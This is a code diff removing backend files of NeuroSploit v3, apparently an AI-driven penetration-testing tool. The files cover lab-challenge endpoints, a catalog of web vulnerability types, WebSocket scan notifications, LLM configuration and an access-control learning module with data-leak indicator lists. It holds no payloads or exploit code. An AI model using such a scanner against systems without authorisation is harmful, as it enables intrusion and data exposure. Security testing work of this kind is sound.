raise HTTPException(status_code=404, detail="Challenge not found")
data = challenge.to_dict()
data["source"] = "database"
data["logs_count"] = len(data.get("logs", []))
return data
@router.get("/stats")
async def get_lab_stats():
"""Get aggregated stats for all lab challenges"""
async with async_session_factory() as db:
# Total counts by status
total_result = await db.execute(
select(
VulnLabChallenge.status,
func.count(VulnLabChallenge.id)
).group_by(VulnLabChallenge.status)
)
status_counts = {row[0]: row[1] for row in total_result.fetchall()}
# Results breakdown
results_q = await db.execute(
select(
VulnLabChallenge.result,
func.count(VulnLabChallenge.id)
).where(VulnLabChallenge.result.isnot(None))
.group_by(VulnLabChallenge.result)
)
result_counts = {row[0]: row[1] for row in results_q.fetchall()}
# Per vuln_type stats
type_stats_q = await db.execute(
select(
VulnLabChallenge.vuln_type,
VulnLabChallenge.result,
func.count(VulnLabChallenge.id)
).where(VulnLabChallenge.status == "completed")
.group_by(VulnLabChallenge.vuln_type, VulnLabChallenge.result)
)
type_stats = {}
for row in type_stats_q.fetchall():
vtype, res, count = row
if vtype not in type_stats:
type_stats[vtype] = {"detected": 0, "not_detected": 0, "error": 0, "total": 0}
type_stats[vtype][res or "error"] = count
type_stats[vtype]["total"] += count
# Per category stats
cat_stats_q = await db.execute(
select(
VulnLabChallenge.vuln_category,
VulnLabChallenge.result,
func.count(VulnLabChallenge.id)
).where(VulnLabChallenge.status == "completed")
.group_by(VulnLabChallenge.vuln_category, VulnLabChallenge.result)
)
cat_stats = {}
for row in cat_stats_q.fetchall():
cat, res, count = row
if cat not in cat_stats:
cat_stats[cat] = {"detected": 0, "not_detected": 0, "error": 0, "total": 0}
cat_stats[cat][res or "error"] = count
cat_stats[cat]["total"] += count
# Currently running
running = len([cid for cid, r in lab_results.items() if r.get("status") == "running"])
total = sum(status_counts.values())
detected = result_counts.get("detected", 0)
completed = status_counts.get("completed", 0)
detection_rate = round((detected / completed * 100), 1) if completed > 0 else 0
return {
"total": total,
"running": running,
"status_counts": status_counts,
"result_counts": result_counts,
"detection_rate": detection_rate,
"by_type": type_stats,
"by_category": cat_stats,
}
@router.post("/challenges/{challenge_id}/stop")
async def stop_challenge(challenge_id: str):
"""Stop a running lab challenge"""
agent = lab_agents.get(challenge_id)
if not agent:
raise HTTPException(status_code=404, detail="No running agent for this challenge")
agent.cancel()
# Update DB
try:
async with async_session_factory() as db:
result = await db.execute(
select(VulnLabChallenge).where(VulnLabChallenge.id == challenge_id)
)
challenge = result.scalar_one_or_none()
if challenge:
challenge.status = "stopped"
challenge.completed_at = datetime.utcnow()
await db.commit()
except:
pass
if challenge_id in lab_results:
lab_results[challenge_id]["status"] = "stopped"
return {"message": "Challenge stopped"}
@router.delete("/challenges/{challenge_id}")
async def delete_challenge(challenge_id: str):
"""Delete a lab challenge record"""
# Stop if running
agent = lab_agents.get(challenge_id)
if agent:
agent.cancel()
lab_agents.pop(challenge_id, None)
lab_results.pop(challenge_id, None)
async with async_session_factory() as db:
result = await db.execute(
select(VulnLabChallenge).where(VulnLabChallenge.id == challenge_id)
)
challenge = result.scalar_one_or_none()
if not challenge:
raise HTTPException(status_code=404, detail="Challenge not found")
await db.delete(challenge)
await db.commit()
return {"message": "Challenge deleted"}
@router.get("/logs/{challenge_id}")
async def get_challenge_logs(challenge_id: str, limit: int = 200):
"""Get logs for a challenge (real-time or from DB)"""
# Check in-memory first for real-time data
mem = lab_results.get(challenge_id)
if mem:
all_logs = mem.get("logs", [])
return {
"challenge_id": challenge_id,
"total_logs": len(all_logs),
"logs": all_logs[-limit:],
"source": "realtime",
}
# Fall back to DB persisted logs
async with async_session_factory() as db:
result = await db.execute(
select(VulnLabChallenge).where(VulnLabChallenge.id == challenge_id)
)
challenge = result.scalar_one_or_none()
if not challenge:
raise HTTPException(status_code=404, detail="Challenge not found")
all_logs = challenge.logs or []
return {
"challenge_id": challenge_id,
"total_logs": len(all_logs),
"logs": all_logs[-limit:],
"source": "database",
}
@@ -1,389 +0,0 @@
"""
NeuroSploit v3 - Vulnerabilities API Endpoints
"""
from typing import List
from fastapi import APIRouter, Depends, HTTPException
from sqlalchemy.ext.asyncio import AsyncSession
from sqlalchemy import select
from backend.db.database import get_db
from backend.models import Vulnerability
from backend.schemas.vulnerability import VulnerabilityResponse, VulnerabilityTypeInfo
router = APIRouter()
# Vulnerability type definitions
VULNERABILITY_TYPES = {
"injection": {
"xss_reflected": {
"name": "Reflected XSS",
"description": "Cross-site scripting via user input reflected in response",
"severity_range": "medium-high",
"owasp_category": "A03:2021",
"cwe_ids": ["CWE-79"]
},
"xss_stored": {
"name": "Stored XSS",
"description": "Cross-site scripting stored in application database",
"severity_range": "high-critical",
"owasp_category": "A03:2021",
"cwe_ids": ["CWE-79"]
},
"xss_dom": {
"name": "DOM-based XSS",
"description": "Cross-site scripting via DOM manipulation",
"severity_range": "medium-high",
"owasp_category": "A03:2021",
"cwe_ids": ["CWE-79"]
},
"sqli_error": {
"name": "Error-based SQL Injection",
"description": "SQL injection detected via error messages",
"severity_range": "high-critical",
"owasp_category": "A03:2021",
"cwe_ids": ["CWE-89"]
},
"sqli_union": {
"name": "Union-based SQL Injection",
"description": "SQL injection exploitable via UNION queries",
"severity_range": "critical",
"owasp_category": "A03:2021",
"cwe_ids": ["CWE-89"]
},
"sqli_blind": {
"name": "Blind SQL Injection",
"description": "SQL injection without visible output",
"severity_range": "high-critical",
"owasp_category": "A03:2021",
"cwe_ids": ["CWE-89"]
},
"sqli_time": {
"name": "Time-based SQL Injection",
"description": "SQL injection detected via response time",
"severity_range": "high-critical",
"owasp_category": "A03:2021",
"cwe_ids": ["CWE-89"]
},
"command_injection": {
"name": "Command Injection",
"description": "OS command injection vulnerability",
"severity_range": "critical",
"owasp_category": "A03:2021",
"cwe_ids": ["CWE-78"]
},
"ssti": {
"name": "Server-Side Template Injection",
"description": "Template injection allowing code execution",
"severity_range": "high-critical",
"owasp_category": "A03:2021",
"cwe_ids": ["CWE-94"]
},
"ldap_injection": {
"name": "LDAP Injection",
"description": "LDAP query injection",
"severity_range": "high",
"owasp_category": "A03:2021",
"cwe_ids": ["CWE-90"]
},
"xpath_injection": {
"name": "XPath Injection",
"description": "XPath query injection",
"severity_range": "medium-high",
"owasp_category": "A03:2021",
"cwe_ids": ["CWE-643"]
},
"nosql_injection": {
"name": "NoSQL Injection",
"description": "NoSQL database injection",
"severity_range": "high-critical",
"owasp_category": "A03:2021",
"cwe_ids": ["CWE-943"]
},
"header_injection": {
"name": "HTTP Header Injection",
"description": "Injection into HTTP headers",
"severity_range": "medium-high",
"owasp_category": "A03:2021",
"cwe_ids": ["CWE-113"]
},
"crlf_injection": {
"name": "CRLF Injection",
"description": "Carriage return line feed injection",
"severity_range": "medium",
"owasp_category": "A03:2021",
"cwe_ids": ["CWE-93"]
}
},
"file_access": {
"lfi": {
"name": "Local File Inclusion",
"description": "Include local files via path manipulation",
"severity_range": "high-critical",
"owasp_category": "A01:2021",
"cwe_ids": ["CWE-98"]
},
"rfi": {
"name": "Remote File Inclusion",
"description": "Include remote files for code execution",
"severity_range": "critical",
"owasp_category": "A01:2021",
"cwe_ids": ["CWE-98"]
},
"path_traversal": {
"name": "Path Traversal",
"description": "Access files outside web root",
"severity_range": "high",
"owasp_category": "A01:2021",
"cwe_ids": ["CWE-22"]
},
"file_upload": {
"name": "Arbitrary File Upload",
"description": "Upload malicious files",
"severity_range": "high-critical",
"owasp_category": "A04:2021",
"cwe_ids": ["CWE-434"]
},
"xxe": {
"name": "XML External Entity",
"description": "XXE injection vulnerability",
"severity_range": "high-critical",
"owasp_category": "A05:2021",
"cwe_ids": ["CWE-611"]
}
},
"request_forgery": {
"ssrf": {
"name": "Server-Side Request Forgery",
"description": "Forge requests from the server",
"severity_range": "high-critical",
"owasp_category": "A10:2021",
"cwe_ids": ["CWE-918"]
},
"ssrf_cloud": {
"name": "SSRF to Cloud Metadata",
"description": "SSRF accessing cloud provider metadata",
"severity_range": "critical",
"owasp_category": "A10:2021",
"cwe_ids": ["CWE-918"]
},
"csrf": {
"name": "Cross-Site Request Forgery",
"description": "Forge requests as authenticated user",
"severity_range": "medium-high",
"owasp_category": "A01:2021",
"cwe_ids": ["CWE-352"]
}
},
"authentication": {
"auth_bypass": {
"name": "Authentication Bypass",
"description": "Bypass authentication mechanisms",
"severity_range": "critical",
"owasp_category": "A07:2021",
"cwe_ids": ["CWE-287"]
},
"session_fixation": {
"name": "Session Fixation",
"description": "Force known session ID on user",
"severity_range": "high",
"owasp_category": "A07:2021",
"cwe_ids": ["CWE-384"]
},
"jwt_manipulation": {
"name": "JWT Token Manipulation",
"description": "Manipulate JWT tokens for auth bypass",
"severity_range": "high-critical",
"owasp_category": "A07:2021",
"cwe_ids": ["CWE-347"]
},
"weak_password_policy": {
"name": "Weak Password Policy",
"description": "Application accepts weak passwords",
"severity_range": "medium",
"owasp_category": "A07:2021",
"cwe_ids": ["CWE-521"]
}
},
"authorization": {
"idor": {
"name": "Insecure Direct Object Reference",
"description": "Access objects without proper authorization",
"severity_range": "high",
"owasp_category": "A01:2021",
"cwe_ids": ["CWE-639"]
},
"bola": {
"name": "Broken Object Level Authorization",
"description": "API-level object authorization bypass",
"severity_range": "high",
"owasp_category": "A01:2021",
"cwe_ids": ["CWE-639"]
},
"privilege_escalation": {
"name": "Privilege Escalation",
"description": "Escalate to higher privilege level",
"severity_range": "critical",
"owasp_category": "A01:2021",
"cwe_ids": ["CWE-269"]
}
},
"api_security": {
"rate_limiting": {
"name": "Missing Rate Limiting",
"description": "No rate limiting on sensitive endpoints",
"severity_range": "medium",
"owasp_category": "A04:2021",
"cwe_ids": ["CWE-770"]
},
"mass_assignment": {
"name": "Mass Assignment",
"description": "Modify unintended object properties",
"severity_range": "high",
"owasp_category": "A04:2021",
"cwe_ids": ["CWE-915"]
},
"excessive_data": {
"name": "Excessive Data Exposure",
"description": "API returns more data than needed",
"severity_range": "medium-high",
"owasp_category": "A01:2021",
"cwe_ids": ["CWE-200"]
},
"graphql_introspection": {
"name": "GraphQL Introspection Enabled",
"description": "GraphQL schema exposed via introspection",
"severity_range": "low-medium",
"owasp_category": "A05:2021",
"cwe_ids": ["CWE-200"]
}
},
"client_side": {
"cors_misconfig": {
"name": "CORS Misconfiguration",
"description": "Permissive CORS policy",
"severity_range": "medium-high",
"owasp_category": "A05:2021",
"cwe_ids": ["CWE-942"]
},
"clickjacking": {
"name": "Clickjacking",
"description": "Page can be framed for clickjacking",
"severity_range": "medium",
"owasp_category": "A05:2021",
"cwe_ids": ["CWE-1021"]
},
"open_redirect": {
"name": "Open Redirect",
"description": "Redirect to arbitrary URLs",
"severity_range": "low-medium",
"owasp_category": "A01:2021",
"cwe_ids": ["CWE-601"]
}
},
"information_disclosure": {
"error_disclosure": {
"name": "Error Message Disclosure",
"description": "Detailed error messages exposed",
"severity_range": "low-medium",
"owasp_category": "A05:2021",
"cwe_ids": ["CWE-209"]
},
"sensitive_data": {
"name": "Sensitive Data Exposure",
"description": "Sensitive information exposed",
"severity_range": "medium-high",
"owasp_category": "A02:2021",
"cwe_ids": ["CWE-200"]
},
"debug_endpoints": {
"name": "Debug Endpoints Exposed",
"description": "Debug/admin endpoints accessible",
"severity_range": "high",
"owasp_category": "A05:2021",
"cwe_ids": ["CWE-489"]
}
},
"infrastructure": {
"security_headers": {
"name": "Missing Security Headers",
"description": "Important security headers not set",
"severity_range": "low-medium",
"owasp_category": "A05:2021",
"cwe_ids": ["CWE-693"]
},
"ssl_issues": {
"name": "SSL/TLS Issues",
"description": "Weak SSL/TLS configuration",
"severity_range": "medium",
"owasp_category": "A02:2021",
"cwe_ids": ["CWE-326"]
},
"http_methods": {
"name": "Dangerous HTTP Methods",
"description": "Dangerous HTTP methods enabled",
"severity_range": "low-medium",
"owasp_category": "A05:2021",
"cwe_ids": ["CWE-749"]
}
},
"logic_flaws": {
"race_condition": {
"name": "Race Condition",
"description": "Exploitable race condition",
"severity_range": "medium-high",
"owasp_category": "A04:2021",
"cwe_ids": ["CWE-362"]
},
"business_logic": {
"name": "Business Logic Flaw",
"description": "Exploitable business logic error",
"severity_range": "varies",
"owasp_category": "A04:2021",
"cwe_ids": ["CWE-840"]
}
}
}
@router.get("/types")
async def get_vulnerability_types():
"""Get all vulnerability types organized by category"""
return VULNERABILITY_TYPES
@router.get("/types/{category}")
async def get_vulnerability_types_by_category(category: str):
"""Get vulnerability types for a specific category"""
if category not in VULNERABILITY_TYPES:
raise HTTPException(status_code=404, detail=f"Category '{category}' not found")
return VULNERABILITY_TYPES[category]
@router.get("/types/{category}/{vuln_type}", response_model=VulnerabilityTypeInfo)
async def get_vulnerability_type_info(category: str, vuln_type: str):
"""Get detailed info for a specific vulnerability type"""
if category not in VULNERABILITY_TYPES:
raise HTTPException(status_code=404, detail=f"Category '{category}' not found")
if vuln_type not in VULNERABILITY_TYPES[category]:
raise HTTPException(status_code=404, detail=f"Type '{vuln_type}' not found in category '{category}'")
info = VULNERABILITY_TYPES[category][vuln_type]
return VulnerabilityTypeInfo(
type=vuln_type,
category=category,
**info
)
@router.get("/{vuln_id}", response_model=VulnerabilityResponse)
async def get_vulnerability(vuln_id: str, db: AsyncSession = Depends(get_db)):
"""Get a specific vulnerability by ID"""
result = await db.execute(select(Vulnerability).where(Vulnerability.id == vuln_id))
vuln = result.scalar_one_or_none()
if not vuln:
raise HTTPException(status_code=404, detail="Vulnerability not found")
return VulnerabilityResponse(**vuln.to_dict())
-247
View File
@@ -1,247 +0,0 @@
"""
NeuroSploit v3 - WebSocket Manager
"""
from typing import Dict, List, Optional
from fastapi import WebSocket
import json
import asyncio
try:
from backend.core.notification_manager import notification_manager, NotificationEvent
HAS_NOTIFICATIONS = True
except ImportError:
HAS_NOTIFICATIONS = False
class ConnectionManager:
"""Manages WebSocket connections for real-time updates"""
def __init__(self):
# scan_id -> list of websocket connections
self.active_connections: Dict[str, List[WebSocket]] = {}
self._lock = asyncio.Lock()
async def connect(self, websocket: WebSocket, scan_id: str):
"""Accept a WebSocket connection and register it for a scan"""
await websocket.accept()
async with self._lock:
if scan_id not in self.active_connections:
self.active_connections[scan_id] = []
self.active_connections[scan_id].append(websocket)
print(f"WebSocket connected for scan: {scan_id}")
def disconnect(self, websocket: WebSocket, scan_id: str):
"""Remove a WebSocket connection"""
if scan_id in self.active_connections:
if websocket in self.active_connections[scan_id]:
self.active_connections[scan_id].remove(websocket)
if not self.active_connections[scan_id]:
del self.active_connections[scan_id]
print(f"WebSocket disconnected for scan: {scan_id}")
async def send_to_scan(self, scan_id: str, message: dict):
"""Send a message to all connections watching a specific scan"""
if scan_id not in self.active_connections:
return
dead_connections = []
for connection in self.active_connections[scan_id]:
try:
await connection.send_text(json.dumps(message))
except Exception:
dead_connections.append(connection)
# Clean up dead connections
for conn in dead_connections:
self.disconnect(conn, scan_id)
async def broadcast_scan_started(self, scan_id: str, target: str = ""):
"""Notify that a scan has started"""
await self.send_to_scan(scan_id, {
"type": "scan_started",
"scan_id": scan_id
})
if HAS_NOTIFICATIONS:
asyncio.create_task(notification_manager.notify(
NotificationEvent.SCAN_STARTED, {"target": target, "scan_id": scan_id}
))
async def broadcast_phase_change(self, scan_id: str, phase: str):
"""Notify phase change (recon, testing, reporting)"""
await self.send_to_scan(scan_id, {
"type": "phase_change",
"scan_id": scan_id,
"phase": phase
})
async def broadcast_progress(self, scan_id: str, progress: int, message: Optional[str] = None):
"""Send progress update"""
await self.send_to_scan(scan_id, {
"type": "progress_update",
"scan_id": scan_id,
"progress": progress,
"message": message
})
async def broadcast_endpoint_found(self, scan_id: str, endpoint: dict):
"""Notify a new endpoint was discovered"""
await self.send_to_scan(scan_id, {
"type": "endpoint_found",
"scan_id": scan_id,
"endpoint": endpoint
})
async def broadcast_path_crawled(self, scan_id: str, path: str, status: int):
"""Notify a path was crawled"""
await self.send_to_scan(scan_id, {
"type": "path_crawled",
"scan_id": scan_id,
"path": path,
"status": status
})
async def broadcast_url_discovered(self, scan_id: str, url: str):
"""Notify a URL was discovered"""
await self.send_to_scan(scan_id, {
"type": "url_discovered",
"scan_id": scan_id,
"url": url
})
async def broadcast_test_started(self, scan_id: str, vuln_type: str, endpoint: str):
"""Notify a vulnerability test has started"""
await self.send_to_scan(scan_id, {
"type": "test_started",
"scan_id": scan_id,
"vulnerability_type": vuln_type,
"endpoint": endpoint
})
async def broadcast_test_completed(self, scan_id: str, vuln_type: str, endpoint: str, is_vulnerable: bool):
"""Notify a vulnerability test has completed"""
await self.send_to_scan(scan_id, {
"type": "test_completed",
"scan_id": scan_id,
"vulnerability_type": vuln_type,
"endpoint": endpoint,
"is_vulnerable": is_vulnerable
})
async def broadcast_vulnerability_found(self, scan_id: str, vulnerability: dict):
"""Notify a vulnerability was found"""
await self.send_to_scan(scan_id, {
"type": "vuln_found",
"scan_id": scan_id,
"vulnerability": vulnerability
})
if HAS_NOTIFICATIONS:
asyncio.create_task(notification_manager.notify(
NotificationEvent.VULN_FOUND, {
"title": vulnerability.get("title", "Vulnerability Found"),
"severity": vulnerability.get("severity", "medium"),
"vulnerability_type": vulnerability.get("vulnerability_type", "unknown"),
"endpoint": vulnerability.get("endpoint", ""),
"description": vulnerability.get("description", ""),
}
))
async def broadcast_log(self, scan_id: str, level: str, message: str):
"""Send a log message"""
await self.send_to_scan(scan_id, {
"type": "log_message",
"scan_id": scan_id,
"level": level,
"message": message
})
async def broadcast_scan_completed(self, scan_id: str, summary: dict):
"""Notify that a scan has completed"""
await self.send_to_scan(scan_id, {
"type": "scan_completed",
"scan_id": scan_id,
"summary": summary
})
if HAS_NOTIFICATIONS:
asyncio.create_task(notification_manager.notify(
NotificationEvent.SCAN_COMPLETED, {
"total_vulnerabilities": summary.get("total_vulnerabilities", 0),
"critical": summary.get("critical", 0),
"high": summary.get("high", 0),
"medium": summary.get("medium", 0),
}
))
async def broadcast_scan_stopped(self, scan_id: str, summary: dict):
"""Notify that a scan was stopped by user"""
await self.send_to_scan(scan_id, {
"type": "scan_stopped",
"scan_id": scan_id,
"status": "stopped",
"summary": summary
})
async def broadcast_scan_failed(self, scan_id: str, error: str, summary: dict = None):
"""Notify that a scan has failed"""
await self.send_to_scan(scan_id, {
"type": "scan_failed",
"scan_id": scan_id,
"status": "failed",
"error": error,
"summary": summary or {}
})
if HAS_NOTIFICATIONS:
asyncio.create_task(notification_manager.notify(
NotificationEvent.SCAN_FAILED, {"error": error}
))
async def broadcast_stats_update(self, scan_id: str, stats: dict):
"""Broadcast updated scan statistics"""
await self.send_to_scan(scan_id, {
"type": "stats_update",
"scan_id": scan_id,
"stats": stats
})
async def broadcast_agent_task(self, scan_id: str, task: dict):
"""Broadcast agent task update (created, started, completed, failed)"""
await self.send_to_scan(scan_id, {
"type": "agent_task",
"scan_id": scan_id,
"task": task
})
async def broadcast_agent_task_started(self, scan_id: str, task: dict):
"""Broadcast when an agent task starts"""
await self.send_to_scan(scan_id, {
"type": "agent_task_started",
"scan_id": scan_id,
"task": task
})
async def broadcast_agent_task_completed(self, scan_id: str, task: dict):
"""Broadcast when an agent task completes"""
await self.send_to_scan(scan_id, {
"type": "agent_task_completed",
"scan_id": scan_id,
"task": task
})
async def broadcast_report_generated(self, scan_id: str, report: dict):
"""Broadcast when a report is generated"""
await self.send_to_scan(scan_id, {
"type": "report_generated",
"scan_id": scan_id,
"report": report
})
async def broadcast_error(self, scan_id: str, error: str):
"""Notify an error occurred"""
await self.send_to_scan(scan_id, {
"type": "error",
"scan_id": scan_id,
"error": error
})
# Global instance
manager = ConnectionManager()
-91
View File
@@ -1,91 +0,0 @@
"""
NeuroSploit v3 - Configuration
"""
import os
from pathlib import Path
from typing import Optional
from pydantic_settings import BaseSettings
class Settings(BaseSettings):
"""Application settings"""
# Application
APP_NAME: str = "NeuroSploit v3"
APP_VERSION: str = "3.0.0"
DEBUG: bool = True
# Server
HOST: str = "0.0.0.0"
PORT: int = 8000
# Database
DATABASE_URL: str = "sqlite+aiosqlite:///./data/neurosploit.db"
# Paths
BASE_DIR: Path = Path(__file__).parent.parent
DATA_DIR: Path = BASE_DIR / "data"
REPORTS_DIR: Path = DATA_DIR / "reports"
SCANS_DIR: Path = DATA_DIR / "scans"
PROMPTS_DIR: Path = BASE_DIR / "prompts"
# LLM Settings
ANTHROPIC_API_KEY: Optional[str] = os.getenv("ANTHROPIC_API_KEY")
OPENAI_API_KEY: Optional[str] = os.getenv("OPENAI_API_KEY")
NIM_API_KEY: Optional[str] = os.getenv("NIM_API_KEY")
NIM_BASE_URL: str = os.getenv("NIM_BASE_URL", "https://integrate.api.nvidia.com/v1/chat/completions")
OPENROUTER_API_KEY: Optional[str] = os.getenv("OPENROUTER_API_KEY")
GEMINI_API_KEY: Optional[str] = os.getenv("GEMINI_API_KEY")
AZURE_OPENAI_API_KEY: Optional[str] = os.getenv("AZURE_OPENAI_API_KEY")
AZURE_OPENAI_ENDPOINT: Optional[str] = os.getenv("AZURE_OPENAI_ENDPOINT")
AZURE_OPENAI_API_VERSION: str = os.getenv("AZURE_OPENAI_API_VERSION", "2024-02-01")
AZURE_OPENAI_DEPLOYMENT: Optional[str] = os.getenv("AZURE_OPENAI_DEPLOYMENT")
TOGETHER_API_KEY: Optional[str] = os.getenv("TOGETHER_API_KEY")
FIREWORKS_API_KEY: Optional[str] = os.getenv("FIREWORKS_API_KEY")
DEFAULT_LLM_PROVIDER: str = "claude"
DEFAULT_LLM_MODEL: str = "claude-sonnet-4-20250514"
MAX_OUTPUT_TOKENS: Optional[int] = None
ENABLE_MODEL_ROUTING: bool = False
# Feature Flags
ENABLE_KNOWLEDGE_AUGMENTATION: bool = False
ENABLE_BROWSER_VALIDATION: bool = False
ENABLE_VULN_AGENTS: bool = False
VULN_AGENT_CONCURRENCY: int = 10
ENABLE_SMART_ROUTER: bool = False
# RAG (Retrieval-Augmented Generation)
ENABLE_RAG: bool = True # Enabled by default (zero deps, uses BM25)
RAG_BACKEND: str = "auto" # "auto", "chromadb", "tfidf", "bm25"
# External Methodology File (injected into all LLM calls)
METHODOLOGY_FILE: Optional[str] = None # Path to .md methodology file
# CLI Agent (AI CLI tools inside Kali sandbox)
ENABLE_CLI_AGENT: bool = False # Feature flag (default: disabled)
CLI_AGENT_MAX_RUNTIME: int = 1800 # Max runtime in seconds (default: 30 min)
CLI_AGENT_DEFAULT_PROVIDER: str = "claude_code" # Default CLI provider
# Codex LLM
CODEX_API_KEY: Optional[str] = os.getenv("CODEX_API_KEY")
# Scan Settings
MAX_CONCURRENT_SCANS: int = 5
DEFAULT_TIMEOUT: int = 30
MAX_REQUESTS_PER_SECOND: int = 10
# CORS
CORS_ORIGINS: list = ["http://localhost:3000", "http://127.0.0.1:3000"]
class Config:
env_file = ".env"
case_sensitive = True
extra = "ignore"
settings = Settings()
# Ensure directories exist
settings.DATA_DIR.mkdir(parents=True, exist_ok=True)
settings.REPORTS_DIR.mkdir(parents=True, exist_ok=True)
settings.SCANS_DIR.mkdir(parents=True, exist_ok=True)
-1
View File
@@ -1 +0,0 @@
# Core modules
@@ -1,423 +0,0 @@
"""
NeuroSploit v3 - Access Control Learning Engine
Adaptive learning system for BOLA/BFLA/IDOR and other access control testing.
Records test outcomes and response patterns to improve future evaluations.
Key insight: HTTP status codes are unreliable for access control testing.
This module learns from actual response DATA patterns to distinguish:
- True positives (cross-user data access)
- False positives (error messages, login pages, empty responses with 200 status)
Usage:
learner = AccessControlLearner()
# Record a test outcome
learner.record_test(vuln_type, url, response_body, is_true_positive, pattern_notes)
# Get learned patterns for a target
patterns = learner.get_patterns_for_target(domain)
# Get learning context for AI prompts
context = learner.get_learning_context(vuln_type)
"""
import json
import logging
import re
from dataclasses import dataclass, field, asdict
from datetime import datetime
from pathlib import Path
from typing import Dict, List, Optional
logger = logging.getLogger(__name__)
DATA_DIR = Path(__file__).parent.parent.parent / "data"
LEARNING_FILE = DATA_DIR / "access_control_learning.json"
@dataclass
class ResponsePattern:
"""A learned response pattern from access control testing."""
pattern_type: str # "denial", "empty", "login_page", "data_leak", "public_data"
indicators: List[str] # Strings/patterns that identify this response type
is_false_positive: bool # True if this pattern indicates a false positive
confidence: float # 0.0-1.0 how reliable this pattern is
example_body: str # Truncated example response body
vuln_type: str # bola, bfla, idor, etc.
target_domain: str # Domain this was learned from
timestamp: str # When this was learned
@dataclass
class TestRecord:
"""Record of an access control test outcome."""
vuln_type: str
target_url: str
status_code: int
response_length: int
is_true_positive: bool
pattern_type: str # What pattern was identified
key_indicators: List[str] # What strings/patterns were decisive
notes: str # Human or AI notes about why this was TP/FP
timestamp: str
class AccessControlLearner:
"""Adaptive learning engine for access control vulnerability testing.
Learns from test outcomes to identify response patterns that indicate
true vs false positives for BOLA, BFLA, IDOR, and related vuln types.
"""
MAX_RECORDS = 500
MAX_PATTERNS = 200
# Pre-seeded patterns from known false positive scenarios
DEFAULT_PATTERNS: List[Dict] = [
{
"pattern_type": "denial_200",
"indicators": ["unauthorized", "forbidden", "access denied", "not authorized",
"permission denied", "insufficient privileges"],
"is_false_positive": True,
"confidence": 0.9,
"description": "Server returns 200 OK but body contains access denial message",
},
{
"pattern_type": "empty_200",
"indicators": ["[]", "{}", '""', "null", ""],
"is_false_positive": True,
"confidence": 0.85,
"description": "Server returns 200 OK with empty/null response body",
},
{
"pattern_type": "login_redirect",
"indicators": ["type=\"password\"", "sign in", "log in", "login",
"authentication required"],
"is_false_positive": True,
"confidence": 0.95,
"description": "Server returns 200 OK but body is a login page",
},
{
"pattern_type": "error_json",
"indicators": ['"error":', '"status":"error"', '"success":false',
'"message":"not found"', '"code":401', '"code":403'],
"is_false_positive": True,
"confidence": 0.9,
"description": "Server returns 200 OK but JSON body indicates error",
},
{
"pattern_type": "own_data",
"indicators": [],
"is_false_positive": True,
"confidence": 0.8,
"description": "Server returns authenticated user's own data regardless of requested ID",
},
{
"pattern_type": "public_data",
"indicators": [],
"is_false_positive": True,
"confidence": 0.7,
"description": "Response contains only public profile fields (username, bio) not private data",
},
{
"pattern_type": "cross_user_data",
"indicators": ['"email":', '"phone":', '"address":', '"ssn":',
'"credit_card":', '"password":', '"secret":'],
"is_false_positive": False,
"confidence": 0.9,
"description": "Response contains another user's private data fields",
},
{
"pattern_type": "admin_data_leak",
"indicators": ['"role":"admin"', '"is_admin":true', '"users":[',
'"audit_log":', '"system_config":'],
"is_false_positive": False,
"confidence": 0.9,
"description": "Response contains admin-level data accessible to non-admin user",
},
{
"pattern_type": "state_change",
"indicators": ['"updated":', '"deleted":', '"created":', '"modified":',
'"success":true'],
"is_false_positive": False,
"confidence": 0.85,
"description": "Write operation succeeded on another user's resource",
},
]
# Known application patterns that cause false positives
KNOWN_FP_PATTERNS: Dict[str, List[str]] = {
"wso2": ["wso2", "carbon", "identity server", "api manager"],
"keycloak": ["keycloak", "red hat sso"],
"spring_security": ["spring security", "whitelabel error"],
"oauth2_proxy": ["oauth2-proxy", "sign in with"],
"cloudflare": ["cloudflare", "cf-ray", "attention required"],
"aws_waf": ["aws-waf", "request blocked"],
}
def __init__(self, data_dir: Optional[Path] = None):
self.data_dir = data_dir or DATA_DIR
self.learning_file = self.data_dir / "access_control_learning.json"
self.records: List[TestRecord] = []
self.custom_patterns: List[ResponsePattern] = []
self._load()
def _load(self):
"""Load learning data from disk."""
try:
if self.learning_file.exists():
with open(self.learning_file, "r") as f:
data = json.load(f)
self.records = [
TestRecord(**r) for r in data.get("records", [])
]
self.custom_patterns = [
ResponsePattern(**p) for p in data.get("patterns", [])
]
logger.debug(f"Loaded {len(self.records)} records, {len(self.custom_patterns)} patterns")
except Exception as e:
logger.debug(f"Failed to load learning data: {e}")
def _save(self):
"""Save learning data to disk."""
try:
self.data_dir.mkdir(parents=True, exist_ok=True)
data = {
"records": [asdict(r) for r in self.records[-self.MAX_RECORDS:]],
"patterns": [asdict(p) for p in self.custom_patterns[-self.MAX_PATTERNS:]],
"metadata": {
"total_records": len(self.records),
"total_patterns": len(self.custom_patterns),
"last_updated": datetime.now().isoformat(),
},
}
with open(self.learning_file, "w") as f:
json.dump(data, f, indent=2)
except Exception as e:
logger.debug(f"Failed to save learning data: {e}")
def record_test(
self,
vuln_type: str,
target_url: str,
status_code: int,
response_body: str,
is_true_positive: bool,
pattern_notes: str = "",
):
"""Record an access control test outcome for learning.
Called after the validation judge makes a decision, with the
verified outcome (true positive or false positive).
"""
# Identify response pattern
pattern_type = self._classify_response(response_body, status_code)
key_indicators = self._extract_key_indicators(response_body)
record = TestRecord(
vuln_type=vuln_type,
target_url=target_url,
status_code=status_code,
response_length=len(response_body),
is_true_positive=is_true_positive,
pattern_type=pattern_type,
key_indicators=key_indicators[:10],
notes=pattern_notes[:500],
timestamp=datetime.now().isoformat(),
)
self.records.append(record)
# Learn new pattern if we have enough data
self._maybe_learn_pattern(record, response_body)
# Auto-save periodically
if len(self.records) % 10 == 0:
self._save()
def _classify_response(self, body: str, status: int) -> str:
"""Classify the response into a pattern type."""
body_lower = body.lower().strip()
if len(body_lower) < 10:
return "empty_200"
# Check for denial indicators
denial = ["unauthorized", "forbidden", "access denied", "not authorized",
"permission denied", '"error":', '"success":false']
if sum(1 for d in denial if d in body_lower) >= 2:
return "denial_200"
# Check for login page
login = ["type=\"password\"", "sign in", "log in", "<form"]
if sum(1 for l in login if l in body_lower) >= 2:
return "login_redirect"
# Check for data fields
data = ['"email":', '"name":', '"phone":', '"address":',
'"role":', '"password":', '"token":']
if sum(1 for d in data if d in body_lower) >= 2:
return "cross_user_data" if status == 200 else "blocked_data"
return "unknown"
def _extract_key_indicators(self, body: str) -> List[str]:
"""Extract key string indicators from the response."""
indicators = []
body_lower = body.lower()
# Check for JSON keys
json_keys = re.findall(r'"(\w+)":', body[:2000])
indicators.extend(json_keys[:10])
# Check for specific patterns
